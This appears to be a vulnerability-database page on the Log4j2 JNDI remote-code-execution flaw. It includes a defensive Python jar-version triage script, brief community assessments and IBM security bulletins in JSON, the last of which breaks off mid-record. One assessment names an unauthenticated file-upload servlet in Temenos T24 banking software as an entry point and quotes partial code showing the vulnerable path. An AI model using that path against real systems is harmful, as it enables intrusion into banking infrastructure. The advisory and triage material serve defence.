ID AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94 Type attackerkb Reporter AttackerKB Modified 2022-02-08T00:00:00
Description
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
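As an added example (not part of this AttackerKB record and not a vendor's tooling), the following Python script turns the version statements in the description above into a triage function and runs it over a constructed `unzip -l` listing of a WAR file, which is how a defender typically inventories bundled log4j-core jars. The listing, the jar names and the function names are assumptions for illustration; the version ranges are the ones the description states.

```python
"""Triage log4j-core jar versions against the CVE-2021-44228 affected range.

Added example, not part of the AttackerKB record. Encodes the description's
version statements: 2.0-beta9 through 2.15.0 affected, except the security
releases 2.12.2, 2.12.3 and 2.3.1; 2.15.0 disables message lookups by
default; 2.16.0 and later remove the JNDI lookup functionality entirely.
"""
import re
from typing import List, Tuple

# Pre-release ordering used by Log4j 2 artifacts: 2.0-beta9 < 2.0-rc1 < 2.0
_PRE_RANK = {"alpha": 0, "beta": 1, "rc": 2}
_RELEASE_RANK = 3
_VERSION_RE = re.compile(
    r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d*))?$", re.IGNORECASE
)
# Matches the path column of an `unzip -l` line (paths without spaces assumed).
_JAR_LINE_RE = re.compile(r"(\S*log4j-core-([0-9][0-9A-Za-z.\-]*?)\.jar)\s*$")


def version_key(version: str) -> Tuple[int, int, int, int, int]:
    """Map a log4j-core version string to a sortable tuple.

    A release ranks above any pre-release of the same number, so
    version_key("2.0-beta9") < version_key("2.0-rc1") < version_key("2.0").
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {version!r}")
    major, minor, patch, pre, pre_num = m.groups()
    pre_rank = _PRE_RANK[pre.lower()] if pre else _RELEASE_RANK
    return (int(major), int(minor), int(patch or 0), pre_rank, int(pre_num or 0))


FIRST_AFFECTED = version_key("2.0-beta9")
LAST_AFFECTED = version_key("2.15.0")
SECURITY_RELEASES = {version_key(v) for v in ("2.12.2", "2.12.3", "2.3.1")}


def classify(version: str) -> str:
    """Return 'fixed', 'affected', 'lookups-disabled' or 'out-of-range'."""
    key = version_key(version)
    if key in SECURITY_RELEASES or key > LAST_AFFECTED:
        return "fixed"             # JNDI lookup functionality removed
    if key == LAST_AFFECTED:
        return "lookups-disabled"  # 2.15.0: disabled by default, still upgrade
    if key >= FIRST_AFFECTED:
        return "affected"
    return "out-of-range"          # below 2.0-beta9: outside this CVE's range


def find_log4j_core(listing: str) -> List[Tuple[str, str]]:
    """Extract (path, version) for every log4j-core jar in an `unzip -l` listing."""
    found = []
    for line in listing.splitlines():
        m = _JAR_LINE_RE.search(line)
        if m:
            found.append((m.group(1), m.group(2)))
    return found


def triage(listing: str) -> List[Tuple[str, str, str]]:
    """Classify each log4j-core jar found in the listing; odd names get 'unparsed'."""
    results = []
    for path, version in find_log4j_core(listing):
        try:
            results.append((path, version, classify(version)))
        except ValueError:
            results.append((path, version, "unparsed"))
    return results


# Constructed sample WAR listing, shaped like `unzip -l app.war` output.
SAMPLE_LISTING = """\
Archive:  app.war
  Length      Date    Time    Name
---------  ---------- -----   ----
  1745700  2021-03-06 10:12   WEB-INF/lib/log4j-core-2.14.1.jar
   300365  2021-03-06 10:12   WEB-INF/lib/log4j-api-2.14.1.jar
  1789565  2021-12-14 09:00   WEB-INF/lib/log4j-core-2.16.0.jar
   420120  2020-01-02 08:00   WEB-INF/lib/shaded/log4j-core-2.3.1.jar
"""

if __name__ == "__main__":
    for path, version, status in triage(SAMPLE_LISTING):
        print(f"{status:17} {version:10} {path}")
```

Note that only log4j-core is inspected, matching the description's scope: log4j-api jars are ignored, and a version below 2.0-beta9 is reported as outside this CVE's range rather than as safe, since other issues (such as the JMSAppender CVE listed in the IBM bulletins further down) are not modelled here.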
Recent assessments:
blobla01 at December 21, 2021 1:23am UTC reported:
The vulnerability exists in Temenos T24, widely used in core banking.
There are many entry points to trigger this vulnerability; as an example, I used the FileUploadServlet, because it is accessible without any authentication:
package com.temenos.t24browser.servlets;

public class FileUploadServlet extends HttpServlet {
    public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        FileUploadServlet.InnerServletClass innerObj = new FileUploadServlet.InnerServletClass(request);
        // truncated
        if (paramName.equalsIgnoreCase("uploadType")) {
            innerObj.setUploadType(paramValue);
            innerObj.setUploadTypeInfoFromT24(); // <= user-controlled uploadType reaches this call
        // truncated
The uploadType value is taken from user input and then passed to innerObj.
Content of innerObj.setUploadTypeInfoFromT24():
AmirFedida at December 12, 2021 8:47am UTC reported:
nu11secur1ty at December 19, 2021 9:49am UTC reported:
ccondon-r7 at December 10, 2021 6:39pm UTC reported:
RhinosF1 at December 10, 2021 10:48pm UTC reported:
{"ibm": [{"lastseen": "2022-03-28T23:36:08", "description": "## Summary\n\nA new vulnerability with log4j has been detected. MAS Monitor uses log4j in all releases and interim fixes are now available for our 8.4, 8.5 and 8.6 releases. More details of the vulnerability are available here: https://nvd.nist.gov/vuln/detail/CVE-2021-44228\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nMonitor Component| All \n \n\n\n## Remediation/Fixes\n\nTo receive the interim fix update your Red Hat OpenShift deployments for each of the Monitor API pods to point to the newly published fix image in IBM Cloud Registry.\n\nSteps:\n\nFirst, disable the Monitor operator by decrementing the number of pods instantiated by the operator deployment from 1 to 0. \n\nNow go each of these 5 deployments: rest-meta, rest-kpi, rest-master, rest-datalake and rest-dscmanager. \n\n \n\n\nChange the image tag from the released version to this image version\n\n \n\n\nFor 8.6:\n\n8.6.2-pre.8.6.hotfix\n\n \n\n\nFor 8.5:\n\n8.5.7-pre.8.5.hotfix\n\n \n\n\nFor 8.4:\n\n8.4.12-pre.8.4.hotfix\n\nAfter the pods restart the interim fix has been applied\n\n \n\n\nMove to this directory on each pod. \n \n \n cd /opt/was/liberty/wlp/usr/servers/default/dropins\n\nList the files in the war. 
\n \n \n unzip -l *.war\n\nVerify your log4j.jar is version 2.15.0.\n\n \n\n\n**Reenable your operator to automatically install/receive future fixpacks as they are released on OLM.**\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n16 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSRHPA\",\"label\":\"IBM Maximo Application Suite\"},\"Component\":\"Monitor Component\",\"Platform\":[{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"All\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T17:37:28", "type": "ibm", "title": "Security Bulletin: MAS Monitor 8.4, 8.5, and 8.6 log4j", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-03-28T17:37:28", "id": "822A5D5DDFBAB14222D402C61CEAC1259D980506DB6102BD80EB619551AE1961", "href": "https://www.ibm.com/support/pages/node/6566913", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-28T23:37:07", "description": "## Summary\n\nWebSphere Application Server is shipped as a 
component of IBM WebSphere Application Server Patterns. Information about security vulnerabilities affecting WebSphere Application Server have been published in a security bulletin.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. A remote attacker with control over Thread Context Map (MDC) input data or a Thread Context Map pattern to exploit this vulnerability to craft malicious input data using a JNDI Lookup pattern and cause a denial of service. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version** \n \n---|--- \nIBM WebSphere Application Server Patterns, all versions| WebSphere Application Server: \n\n * 9.0\n * 8.5\n * 8.0\n * Liberty \n \n \n\n\n## Remediation/Fixes\n\nPlease consult the following security bulletin for vulnerability details and information about fixes \n\n * [Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n15 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Product\":{\"code\":\"SSAJ7T\",\"label\":\"WebSphere Application Server Patterns\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF002\",\"label\":\"AIX\"}],\"Version\":\"Version Independent\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T21:14:11", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in WebSphere Application Server shipped with IBM WebSphere Application Server Patterns", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-16T21:14:11", "id": "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "href": "https://www.ibm.com/support/pages/node/6527326", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-03T21:26:54", "description": "## Summary\n\nThere is a vulnerability in the Apache log4j library used by IBM WebSphere Application Server in the Admin Console and UDDI Registry application and used by the IBM WebSphere Application Server Liberty for z/OS in features zosConnect-1.0 and zosConnect-1.2. This has been addressed in IBM WebSphere Application Server by removing log4j from the Admin Console and UDDI Registry application. This has been addressed in IBM WebSphere Application Server Liberty for z/OS by removing log4j from the zosConnect-1.0 and zosConnect-1.2 features.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nInfoSphere Master Data Management| 12.0 \n \nInfoSphere Master Data Management\n\n| 11.6 \n \n\n\n## Remediation/Fixes\n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin** \n---|---|--- \nInfoSphere Master Data Management v11.6, v12.0| IBM WebSphere Application Server version 9.0.| [Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/security-bulletin-multiple-vulnerabilities-apache-log4j-affect-ibm-websphere-application-server-and-ibm-websphere-application-server-liberty-cve-2021-4104-cve-2021-45046> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get 
Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n10 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSWSR9\",\"label\":\"IBM InfoSphere Master Data Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF048\",\"label\":\"SUSE\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"12.0, 11.6\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-27T10:23:01", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server used by IBM Master Data Management", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-27T10:23:01", "id": 
"209DDCAB6F475A868DA84DD19D31132027FF62B259B6541CA0C9859AD7CF6ED3", "href": "https://www.ibm.com/support/pages/node/6539552", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:49:35", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Case Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. 
\nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Case Manager| 5.3CD \nIBM Case Manager| 5.2.1 \nIBM Case Manager| 5.2.0 \nIBM Case Manager| 5.1.1 \n \n## Remediation/Fixes\n\nPlease consult the security bulletin [Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" ) for vulnerability details and information about fixes.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n16 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSCTJ4\",\"label\":\"Case Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"5.1.1.x, 5.2.0, 5.2.1, 5.3.x\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T07:09:10", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Case Manager (CVE-2021-4104, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-22T07:09:10", "id": "023C54E1D297D5AA9E7F44F8089DE35CB079281FA1776467BF8B7A7AD4FE252E", "href": "https://www.ibm.com/support/pages/node/6527332", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-13T23:39:40", "description": "## Summary\n\nIBM WebSphere Application Server is a required product for IBM Tivoli Network Manager versions 4.1.1.x and 4.2.0.x. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\n** CVEID: 